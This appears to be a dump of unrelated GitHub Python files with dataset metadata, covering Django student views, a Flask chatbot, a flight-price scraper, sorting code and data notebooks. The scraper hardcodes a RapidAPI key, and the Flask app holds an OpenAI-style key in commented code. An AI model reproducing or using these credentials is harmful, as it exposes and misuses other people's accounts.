feat_fc.detach().cpu().numpy()\n ptr = ptr + batch_num\n print('Extracting Time:\\t {:.3f}'.format(time.time()-start))\n return gall_feat_pool, gall_feat_fc\n \ndef extract_query_feat(query_loader):\n net.eval()\n print ('Extracting Query Feature...')\n start = time.time()\n ptr = 0\n query_feat_pool = np.zeros((nquery, pool_dim))\n query_feat_fc = np.zeros((nquery, pool_dim))\n with torch.no_grad():\n for batch_idx, (input, label ) in enumerate(query_loader):\n batch_num = input.size(0)\n input = Variable(input.cuda())\n feat_pool, feat_fc = net(input, input, test_mode[1])\n query_feat_pool[ptr:ptr+batch_num,: ] = feat_pool.detach().cpu().numpy()\n query_feat_fc[ptr:ptr+batch_num,: ] = feat_fc.detach().cpu().numpy()\n ptr = ptr + batch_num \n print('Extracting Time:\\t {:.3f}'.format(time.time()-start))\n return query_feat_pool, query_feat_fc\n\n\ndef process_llcm(img_dir, mode = 1):\n if mode== 1:\n input_data_path = os.path.join(data_path, 'idx/test_vis.txt')\n elif mode ==2:\n input_data_path = os.path.join(data_path, 'idx/test_nir.txt')\n \n with open(input_data_path) as f:\n data_file_list = open(input_data_path, 'rt').read().splitlines()\n file_image = [img_dir + '/' + s.split(' ')[0] for s in data_file_list]\n file_label = [int(s.split(' ')[1]) for s in data_file_list]\n file_cam = [int(s.split('c0')[1][0]) for s in data_file_list]\n \n return file_image, np.array(file_label), np.array(file_cam)\n\n \nif dataset == 'llcm':\n\n print('==> Resuming from checkpoint..')\n if len(args.resume) > 0:\n model_path = checkpoint_path + args.resume\n # model_path = checkpoint_path + 'llcm_agw_p4_n8_lr_0.1_seed_0_best.t'\n if os.path.isfile(model_path):\n print('==> loading checkpoint {}'.format(args.resume))\n checkpoint = torch.load(model_path)\n net.load_state_dict(checkpoint['net'])\n print('==> loaded checkpoint {} (epoch {})'\n .format(args.resume, checkpoint['epoch']))\n else:\n print('==> no checkpoint found at {}'.format(args.resume))\n\n # testing set\n query_img, query_label, query_cam = process_llcm(data_path, mode=test_mode[1])\n gall_img, gall_label, gall_cam = process_llcm(data_path, mode=test_mode[0])\n\n nquery = len(query_label)\n ngall = len(gall_label)\n print(\"Dataset statistics:\")\n print(\" ------------------------------\")\n print(\" subset | # ids | # images\")\n print(\" ------------------------------\")\n print(\" query | {:5d} | {:8d}\".format(len(np.unique(query_label)), nquery))\n print(\" gallery | {:5d} | {:8d}\".format(len(np.unique(gall_label)), ngall))\n print(\" ------------------------------\")\n\n queryset = TestData(query_img, query_label, transform=transform_test, img_size=(args.img_w, args.img_h))\n query_loader = data.DataLoader(queryset, batch_size=args.test_batch, shuffle=False, num_workers=4)\n\n trial_gallset = TestData(gall_img, gall_label, transform=transform_test, img_size=(args.img_w, args.img_h))\n trial_gall_loader = data.DataLoader(trial_gallset, batch_size=args.test_batch, shuffle=False, num_workers=4)\n\n print('Data Loading Time:\\t {:.3f}'.format(time.time() - end))\n\n query_feat_pool, query_feat_fc = extract_query_feat(query_loader)\n gall_feat_pool, gall_feat_fc = extract_gall_feat(trial_gall_loader)\n\n result = {'gallery_f':gall_feat_fc,'gallery_label':gall_label,'gallery_cam':gall_cam,'query_f':query_feat_fc,'query_label':query_label,'query_cam':query_cam}\n 
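# Hypothetical sanity check (an editor's sketch, not part of the original script):\n    # the saved .mat is only meaningful if feature rows align with the label arrays.\n    assert gall_feat_fc.shape[0] == len(gall_label)\n    assert query_feat_fc.shape[0] == len(query_label)\n    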
scipy.io.savemat('tsne.mat',result)\n","repo_name":"ZYK100/LLCM","sub_path":"Visualization/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":8384,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"5"} +{"seq_id":"21893233239","text":"c = input()\na = ['monday','tuesday','wednesday','thursday','friday']\nb = ['saturday','sunday']\n# Membership tests cover both lists safely; indexing b[i] inside range(len(a))\n# would raise IndexError once i >= len(b).\nif c in a:\n    print(\"no\")\nelif c in b:\n    print(\"yes\")\n","repo_name":"saineeharika7/Basic-JS","sub_path":"stringscodekata/days.py","file_name":"days.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"23986462211","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n    path('dashboard/', views.homepage, name='dashboard'),\n    path('result/', views.results, name='result'),\n    path('overview/', views.profile, name='overview'),\n    path('new/', views.addpatient, name='addPatient'),\n    path('', views.signin, name='sign-in'),\n    path('petscan/', views.petscan, name='pet')\n\n    # path('rujul', views.rujul, name='rujul'),\n]","repo_name":"iamawesome24/DiseasePred","sub_path":"Dashboard/dash_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36737366089","text":"from gen_input import gen_random_array\n\ninput_arr = gen_random_array(100)\n\n# Time complexity: O(N^2)\n# Space complexity: O(N)\n\nprint(f\"Before sorting: {input_arr}\")\n\ndef run_insert(arr, a):\n    insert_pos = -1\n    for i, num in enumerate(arr):\n        if num >= a:\n            insert_pos = i\n            break\n    if insert_pos == -1:\n        insert_pos = len(arr)\n    arr.insert(insert_pos, a)\n    return arr\n\ndef insertion_sort(arr):\n    current_arr = []\n    for a in arr:\n        current_arr = run_insert(current_arr, a)\n    return current_arr\n\noutput_arr = insertion_sort(input_arr)\nprint(f\"After sorting: {output_arr}\")\n\n\n","repo_name":"Lawlietgit/Algorithms","sub_path":"Sorting_algos/inserting_sorting.py","file_name":"inserting_sorting.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6197540052","text":"from django.conf.urls import url\n \n# from module import class\n# from app.controllers.usercontroller import Usercontroller\nfrom app.controllers.api import usercontroller\nfrom app.controllers.api import postcontroller\nfrom app.controllers import homecontroller\n\nurlpatterns = [\n    url(r'^home/index$', homecontroller.index),\n    url(r'^home/register$', homecontroller.register),\n    url(r'^home/profile$', homecontroller.profile),\n    url(r'^api/user/register/$', usercontroller.register),\n    url(r'^home/login$', homecontroller.login),\n    url(r'^api/user/login/$', usercontroller.login),\n    url(r'^api/user/logout/$', usercontroller.logout),\n    url(r'^api/user/detect_login/$', usercontroller.detect_login),\n    url(r'^api/post/post_editing/$', postcontroller.post_editing),\n    url(r'^api/post/post_details/$', postcontroller.post_details),\n    url(r'^home/post_editing$', homecontroller.post_editing),\n    url(r'^home/myposts$', homecontroller.myposts),\n    url(r'^api/post/getuserposts$', postcontroller.getuserposts),\n    url(r'^home/post_details$', 
homecontroller.post_details),\n]","repo_name":"illovey/forum","sub_path":"forum/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"25112904517","text":"import requests\nimport json\nurl = \"https://priceline-com-provider.p.rapidapi.com/v2/flight/departures\"\n\nquerystring = {\"departure_date\":\"2022-02-06\",\"sid\":\"iSiX639\",\"adults\":\"1\",\"origin_airport_code\":\"IST\",\"cabin_class\":\"first\",\"destination_city_id\":\"NYC\"}\n\nheaders = {\n 'x-rapidapi-host': \"priceline-com-provider.p.rapidapi.com\",\n 'x-rapidapi-key': \"a17d6697f9msh416ba0f0266c920p1a2803jsne3d403bd5310\"\n }\n\nresponse = requests.request(\"GET\", url, headers=headers, params=querystring)\n\n\ndata = json.loads(response.content) \nwith open('flights.json', 'w', encoding='utf-8') as f:\n json.dump(data, f, ensure_ascii=False, indent=4)","repo_name":"haxhex/NoSQL-Flight-System","sub_path":"crawling.py","file_name":"crawling.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"13728402188","text":"from rest_framework import status\nfrom rest_framework.decorators import permission_classes\nfrom rest_framework.response import Response\nfrom django.shortcuts import get_object_or_404\nfrom rest_framework import viewsets\nfrom rest_framework.decorators import api_view\nfrom rest_framework.permissions import IsAuthenticated\nfrom .serializers import StudentSerializer,StudentBulkUploadSerializer, StudentHostelSerializer,StudentRelationContactSerializer, StudentStatusSerializer, StudentsCartSerializer\nfrom .models import Student,StudentBulkUpload, StudentHostelService, StudentNationlityCartInfo, StudentStatus,StudentRelationContact\nfrom django.db.models import Q\nfrom rest_framework.pagination import PageNumberPagination\nfrom .filters import StudentFilter\nfrom django_filters.utils import translate_validation\nimport ast\nfrom results.models import Result,Course\nfrom departments.models import Subject \nfrom accounts.models import User\n\n\nclass StudentViews(viewsets.ModelViewSet):\n\n \"\"\"view for students\"\"\"\n\n queryset = Student.objects.all()\n serializer_class = StudentSerializer\n # permission_classes = (IsAuthenticated,)\n \n\n def list(self, request):\n search = request.query_params.get('search')\n order = request.query_params.get('order')\n paginator = PageNumberPagination()\n paginator.page_size=5\n first_name=''\n if search==None:\n search=''\n if order == None:\n first_name = 'first_name'\n elif order == 'desc':\n first_name = '-first_name'\n \n student = Student.objects.distinct().filter(\n Q(first_name__icontains=search) |\n Q(last_name__icontains=search) |\n Q(score__icontains=search) \n ).order_by(first_name)\n \n studentfilter = StudentFilter(request.GET, queryset=student)\n pages = paginator.paginate_queryset(studentfilter.qs, request)\n \n serializer = StudentSerializer(pages, many=True)\n return paginator.get_paginated_response(serializer.data)\n\n def retrieve(self, request, pk=None):\n student = get_object_or_404(self.queryset, pk=pk)\n serializer = StudentSerializer(student)\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n def create(self, request):\n serializer = StudentSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return 
Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \n def update(self, request, pk=None):\n student = get_object_or_404(self.queryset, pk=pk)\n serializer = StudentSerializer(student, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def partial_update(self, request, pk=None):\n student = get_object_or_404(self.queryset, pk=pk)\n serializer = StudentSerializer(student, data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def destroy(self, request, pk=None):\n student = get_object_or_404(self.queryset, pk=pk)\n student.delete()\n return Response({\"message\": \"Student deleted successfully!\"}, status=status.HTTP_204_NO_CONTENT)\n\n\nclass StudentStatusViews(viewsets.ModelViewSet):\n\n \"\"\"view for students Status\"\"\"\n serializer_class = StudentStatusSerializer\n queryset = StudentStatus.objects.all()\n permission_classes = (IsAuthenticated, )\n\n def list(self, request):\n student_status = StudentStatus.objects.all()\n serializer = StudentStatusSerializer(student_status, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n def retrieve(self, request, pk=None):\n student_status = get_object_or_404(self.queryset, pk=pk)\n serializer = StudentStatusSerializer(student_status)\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n def create(self, request):\n serializer = StudentStatusSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \n def update(self, request, pk=None):\n student_status = get_object_or_404(self.queryset, pk=pk)\n serializer = StudentStatusSerializer(student_status, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def partial_update(self, request, pk=None):\n student_status = get_object_or_404(self.queryset, pk=pk)\n serializer = StudentStatusSerializer(student_status, data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def destroy(self, request, pk=None):\n student_status = get_object_or_404(self.queryset, pk=pk)\n student_status.delete()\n return Response({\"message\": \"student status deleted successfully!\"}, status=status.HTTP_204_NO_CONTENT)\n\n\nclass StudentRelationContactViews(viewsets.ModelViewSet):\n\n \"\"\"view for students contact\"\"\"\n serializer_class = StudentRelationContactSerializer\n queryset = StudentRelationContact.objects.all()\n permission_classes = (IsAuthenticated, )\n\n def list(self, request):\n student_contact = StudentRelationContact.objects.all()\n serializer = StudentRelationContactSerializer(student_contact, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n def retrieve(self, request, pk=None):\n student_contact = get_object_or_404(self.queryset, pk=pk)\n serializer = 
StudentRelationContactSerializer(student_contact)\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n def create(self, request):\n serializer = StudentRelationContactSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \n def update(self, request, pk=None):\n student_contact = get_object_or_404(self.queryset, pk=pk)\n serializer = StudentRelationContactSerializer(student_contact, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def partial_update(self, request, pk=None):\n student_contact = get_object_or_404(self.queryset, pk=pk)\n serializer = StudentRelationContactSerializer(student_contact, data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def destroy(self, request, pk=None):\n student_contact = get_object_or_404(self.queryset, pk=pk)\n student_contact.delete()\n return Response({\"message\": \"student contact deleted successfully!\"}, status=status.HTTP_204_NO_CONTENT)\n\n\nclass StudentHostelViews(viewsets.ModelViewSet):\n\n \"\"\"view for students hostel\"\"\"\n serializer_class = StudentHostelSerializer\n queryset = StudentHostelService.objects.all()\n permission_classes = (IsAuthenticated, )\n\n def list(self, request):\n student_hostel = StudentHostelService.objects.all()\n serializer = StudentHostelSerializer(student_hostel, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n def retrieve(self, request, pk=None):\n student_hostel = get_object_or_404(self.queryset, pk=pk)\n serializer = StudentHostelSerializer(student_hostel)\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n def create(self, request):\n serializer = StudentHostelSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \n def update(self, request, pk=None):\n student_hostel = get_object_or_404(self.queryset, pk=pk)\n serializer = StudentHostelSerializer(student_hostel, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def partial_update(self, request, pk=None):\n student_hostel = get_object_or_404(self.queryset, pk=pk)\n serializer = StudentHostelSerializer(student_hostel, data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def destroy(self, request, pk=None):\n student_hostel = get_object_or_404(self.queryset, pk=pk)\n student_hostel.delete()\n return Response({\"message\": \"student hostel deleted successfully!\"}, status=status.HTTP_204_NO_CONTENT)\n\n\nclass StudentCartInfolViews(viewsets.ModelViewSet):\n\n \"\"\"view for students Info\"\"\"\n serializer_class = StudentsCartSerializer\n queryset = StudentNationlityCartInfo.objects.all()\n 
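# NOTE: DRF's ModelViewSet already supplies these CRUD actions from\n    # queryset/serializer_class alone; the explicit methods in these viewsets\n    # mainly customize the response payloads and status codes.\n    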
permission_classes = (IsAuthenticated, )\n\n def list(self, request):\n student_cart = StudentNationlityCartInfo.objects.all()\n serializer = StudentsCartSerializer(student_cart, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n def retrieve(self, request, pk=None):\n student_cart = get_object_or_404(self.queryset, pk=pk)\n serializer = StudentsCartSerializer(student_cart)\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n def create(self, request):\n serializer = StudentsCartSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \n def update(self, request, pk=None):\n student_cart = get_object_or_404(self.queryset, pk=pk)\n serializer = StudentsCartSerializer(student_cart, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def partial_update(self, request, pk=None):\n student_cart = get_object_or_404(self.queryset, pk=pk)\n serializer = StudentsCartSerializer(student_cart, data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def destroy(self, request, pk=None):\n student_cart = get_object_or_404(self.queryset, pk=pk)\n student_cart.delete()\n return Response({\"message\": \"student cart info deleted successfully!\"}, status=status.HTTP_204_NO_CONTENT)\n\n\n@api_view(['GET','POST'])\ndef student_bulk_upload_view(request):\n if request.method == \"POST\":\n file = request.FILES.get(\"file\")\n \n bulk_upload = StudentBulkUpload.objects.create(\n csv_file=file\n )\n \n if bulk_upload:\n return Response({\"message\":\"file uploaded\"})\n else:\n return Response({\"message\":\"file not uploaded \"})\n\n\n@api_view(['GET'])\ndef semester_report_view(request, pk):\n student = Student.objects.get(pk=pk)\n results = []\n for result in Result.objects.all():\n if result.student == student and result.subject.semester == student.semester:\n results.append(result)\n subjects = Subject.objects.filter(department=student.department, semester=student.semester)\n \n my_courses = Course.objects.filter(students=student)\n # drawing charts for results\n courses = []\n score = []\n\n for result in results:\n if result.subject.semester == student.semester:\n courses.append(result.subject.subject)\n score.append(int(result.total_score()))\n \n total_credits = 0\n scores = 0\n percentage = 0\n passed_credits = 0\n grade = \"D\"\n\n for subject in subjects:\n total_credits += subject.credit\n\n for result in results:\n if result.subject.semester.semester_name == result.student.semester.semester_name:\n scores += result.total_score()\n if result.total_score() > 55:\n passed_credits += result.subject.credit\n if result.total_score() >= 55:\n result.is_pass = True\n else:\n result.is_pass = False\n result.save() \n if passed_credits > (total_credits // 2) and student.semester.semester_number != 8:\n student.semester.semester_number += 1\n\n for course in my_courses:\n course.students.remove(student)\n student.save()\n try:\n percentage = scores / total_credits\n except:\n percentage = 0\n\n status = \"ناکام\"\n for r in results:\n if r.total_score() < 55:\n status = 
\"چانس\"\n            break\n        else:\n            status = \"کامیاب\"\n    if passed_credits < (total_credits // 2):\n        status = \"ناکام\"\n    \n    # Map the overall percentage to a letter grade band; both bounds must hold.\n    if percentage < 55:\n        grade = \"F\"\n    elif percentage >= 55 and percentage <= 69:\n        grade = \"D\"\n    elif percentage >= 70 and percentage <= 79:\n        grade = \"C\"\n    elif percentage >= 80 and percentage <= 89:\n        grade = \"B\"\n    elif percentage >= 90 and percentage <= 100:\n        grade = \"A\"\n    # context = {\n    #     \"results\": results,\n    #     \"student\": student,\" total_credits\": total_credits,\"scores\":scores,\" percentage\":percentage,\"passed_credits\": passed_credits,\"grade\":grade,\"score\":score,\"courses\":courses,\"status\":status\n    # }\n    return ","repo_name":"codingRah/mis","sub_path":"students/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"41805702204","text":"import argparse\n\nfrom fasttrain.training_stacked_boost import train_stacked_boost\nfrom fasttrain.model.boostresnet import BoostResNetCIFAR\nfrom fasttrain.schedules import resnet_paper_schedule\n\nparser = argparse.ArgumentParser(description='Train ResNet on CIFAR10 with boosting')\nparser.add_argument('-n', '--number', type=int, default=3)\nparser.add_argument('-b', '--batch-size', type=int, default=128)\nparser.add_argument('-lr', '--learn_rate', type=float, default=0.1)\nparser.add_argument('-sd', '--stochastic-depth', type=str, default=None)\nparser.add_argument('-st', '--show-test', type=bool, default=True)\nparser.add_argument('-pa', '--pre-activated', type=bool, default=False)\nparser.add_argument('-hp', '--half-precision', type=bool, default=False)\n\nargs = parser.parse_args()\n\nstochastic_depth = None\nif args.stochastic_depth:\n    sd = args.stochastic_depth\n    if sd == 'true':\n        stochastic_depth = {}\n    else:\n        splitted = sd.split('-')\n        stochastic_depth = {\n            'from': float(splitted[0]),\n            'to': float(splitted[1])\n        }\n\nbatch_size = args.batch_size\nn = args.number\npre_activated = args.pre_activated\nbase_lr = args.learn_rate\nshow_test = args.show_test\n\ntrain_stacked_boost(args.number,\n                    batch_size=args.batch_size,\n                    stochastic_depth=stochastic_depth,\n                    show_test=args.show_test,\n                    base_lr=args.learn_rate,\n                    pre_activated=args.pre_activated)\n\n","repo_name":"solomatov/cs229-project","sub_path":"scripts/resnet_stacked_boost.py","file_name":"resnet_stacked_boost.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"42444975323","text":"from typing import Optional, Iterable\n\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.base import BaseEstimator, TransformerMixin\n\nfrom permutation.models.modelprotocol import Model\nfrom permutation.models.sklearnmodel import AbstractSKLearnModel\nfrom permutation.models.hyperparameters import HParams\n\n\nclass RF(AbstractSKLearnModel):\n    \"\"\"\n    Random Forest model\n\n    Methods\n    -------\n    set_model(cls, model_dependency, hparams, preprocessing_dependencies):\n        Set up the model, preprocessing pipeline and read in hyperparameters\n    \"\"\"\n\n    algorithm_name = \"Random Forest\"\n    algorithm_abv = \"RF\"\n    algorithm_type = \"Regression\"\n\n    @classmethod\n    def set_model(\n        cls,\n        model_dependency: BaseEstimator = RandomForestRegressor,\n        hparams: Optional[HParams] = None,\n        preprocessing_dependencies: Optional[Iterable[tuple[str, TransformerMixin]]] = None,\n    ) -> Model:\n        \"\"\"Set up model from config files and super 
class\"\"\"\n if preprocessing_dependencies is None:\n preprocessing_dependencies = []\n\n return super()._set_model(\n model_dependency=model_dependency,\n hparams=hparams,\n preprocessing_dependencies=preprocessing_dependencies,\n )\n","repo_name":"bagherilab/emulation","sub_path":"src/permutation/models/rf.py","file_name":"rf.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"20585744894","text":"from flask import Flask, render_template, jsonify, request\nimport config\nimport openai\nimport aiapi\n\nimport pandas as pd\nimport numpy as np\n\n\ndef page_not_found(e):\n return render_template('404.html'), 404\n\n\napp = Flask(__name__)\napp.config.from_object(config.config['development'])\n\napp.register_error_handler(404, page_not_found)\n\n\n# print(\"reading embeddings for bible.org into dataframe\") \n# df2=pd.read_csv('processed/borg_embeddings.csv', index_col=0)\n# df2['embeddings'] = df2['embeddings'].replace(r'\\n',' ', regex=True)\n# df2['embeddings'] = df2['embeddings'].replace(r' ',',', regex=True)\n# df2['embeddings'] = df2['embeddings'].replace(r' ',',', regex=True)\n# df2['embeddings'] = df2['embeddings'].replace(r' ',',', regex=True)\n# df2['embeddings']=df2['embeddings'].tolist()\n\n# print(\"processing embedddings\")\n# df3=df2\n# embeddings_list = []\n\n# for i, row in df2.iterrows():\n# #print(i,row['embeddings'])\n# if row['embeddings'][1] == ',':\n# #print(\"comma detected\")\n# s=row['embeddings'][0]+row['embeddings'][2:]\n# else: \n# s=row['embeddings']\n# embeddings_list.append([float(x.strip(' []')) for x in s.split(',')])\n \n# df3['embeddings']=embeddings_list\n\n\n# ##################################################################\n# # Connect to the Milvus Vector Database (which is already running)\n# ##################################################################\n# HOST = 'localhost'\n# PORT = 19530\n# COLLECTION_NAME = 'borg_data'\n# DIMENSION = 768\n# #DIMENSION = 1536\n# #OPENAI_ENGINE = 'text-embedding-ada-002'\n\n# openai.api_key = \"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\"\n\n# INDEX_PARAM = {\n# 'metric_type':'L2',\n# 'index_type':\"HNSW\",\n# 'params':{'M': 8, 'efConstruction': 64}\n# }\n\n# QUERY_PARAM = {\n# \"metric_type\": \"L2\",\n# \"params\": {\"ef\": 64},\n# }\n\n# BATCH_SIZE = 1000\n\n# from pymilvus import connections, utility, FieldSchema, Collection, CollectionSchema, DataType\n\n# # Connect to Milvus Database\n# connections.connect(host=HOST, port=PORT)\n\n# utility.list_collections()\n# print(\"Connecting to Milvus\",COLLECTION_NAME )\n# print(\"list of milvus collections\", utility.list_collections())\n\n# # collection.is_empty\n# collection = Collection(COLLECTION_NAME)\n# collection.load()\n\n# print(\"Is Collection Empty?\",collection.is_empty)\n\n# ##################################################################\n# # Connect to the Milvus Vector Database (which is already running)\n# ##################################################################\n\n\n#print(df3.head())\n\nprint(\"starting app\")\n\n@app.route('/', methods = ['POST', 'GET'])\n\ndef index():\n\n if request.method == 'POST':\n question=request.form['prompt']\n\n res={}\n # res['answer']=aiapi.generateChatResponse(df3,prompt)\n res['answer']=aiapi.answer_question(question)\n return jsonify(res),200\n\n return render_template('index.html', **locals())\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port='8888', 
debug=True)\n","repo_name":"maustin10/biblechat_flask_only","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"13617186828","text":"# function to remove funky apostrophes and replace them\n# with single quotes\n\nimport glob\n\n\ndef inplace_change(filename, old_string, new_string):\n with open(filename, encoding=\"latin-1\") as f:\n s = f.read()\n if old_string not in s:\n print(f'\"{old_string}\" not found in {filename}')\n return\n\n with open(filename, 'w', encoding=\"latin-1\") as f:\n print(f'Changing \"{old_string}\" to \"{new_string}\" in {filename}')\n s = s.replace(old_string, new_string)\n f.write(s)\n\n\nfor file in glob.iglob('testcorpus/8090/*.txt'):\n inplace_change(f'{file}', '\\x92', \"'\")\n","repo_name":"stevenvandenberghe/language_of_taste","sub_path":"utils/inplace_change.py","file_name":"inplace_change.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"35660905539","text":"# -*- encoding=utf8 -*-\n__author__ = \"wb-wgz629946\"\nfrom poco.drivers.android.uiautomation import AndroidUiautomationPoco\npoco = AndroidUiautomationPoco(use_airtest_input=True, screenshot_each_action=False)\nimport time\nfrom airtest.core.api import *\nstop_app(\"com.hanweb.android.zhejiang.activity\")\nstart_app(\"com.hanweb.android.zhejiang.activity\")\ntime.sleep(10)\nresin=\"长三角无感漫游\"\nprint(type(resin))\nwhile True:\n wait(Template(r\"tpl1571208672732.png\", record_pos=(0.004, 0.089), resolution=(1080, 2340)))\n touch(Template(r\"tpl1571207083351.png\", record_pos=(0.017, 0.075), resolution=(1080, 2340)))\n time.sleep(6)\n if exists(Template(r\"tpl1571208794248.png\", record_pos=(0.018, -0.931), resolution=(1080, 2340))):\n res = poco(\"com.hanweb.android.zhejiang.activity:id/tv_title\").get_text()\n print(res)\n print(resin)\n if res == resin:\n print(\"用例通过\")\n else:\n print(\"用例失败\")\n break;\n# finally:\n# wait(Template(r\"tpl1571208794248.png\", record_pos=(0.018, -0.931), resolution=(1080, 2340)))\n# res = poco(\"com.hanweb.android.zhejiang.activity:id/tv_title\").get_text()\n# print(res)\n# if assert_equal(\"res\",\"长三角无感漫游\"):\n# print(\"用例通过\")\n \n \n ","repo_name":"jasonloverain/constantine01","sub_path":"airtest_uiauto_demo/air_case/热点关注点击长三角专区跳转.air/热点关注点击长三角专区跳转.py","file_name":"热点关注点击长三角专区跳转.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"40705430331","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[5]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom datetime import datetime \n\n\n# In[6]:\n\n\ndf = pd.read_csv(\"NFLX.csv\")\n\n\n# In[7]:\n\n\ndf\n\n\n# In[8]:\n\n\ndf.head()\n\n\n# In[9]:\n\n\nsns.set(rc={'figure.figsize' :(10,5)})\n\n\n# # date column as index\n\n# In[10]:\n\n\ndf['Date'] = pd.to_datetime(df['Date'])\ndf= df.set_index('Date')\ndf.head()\n\n\n# # Volume of Stock Traded\n\n# In[11]:\n\n\nsns.lineplot(x=df.index, y=df['Volume'], label='Volume')\nplt.title(\"Volume of stock VS time\")\n\n\n# # Netflix stock price- High, Open, Close\n\n# In[12]:\n\n\ndf.plot(y=['High','Close','Open'],title=\"Netflix stock price\")\n\n\n# # Netflix stock price- Day, Month, Year wise\n\n# In[13]:\n\n\nfig, (ax1,ax2,ax3)=plt.subplots(3, figsize = (15,10)) 
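# The three stacked axes below compare mean traded Volume grouped by calendar\n# day, month, and year of the DatetimeIndex (one subplot per aggregation level).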
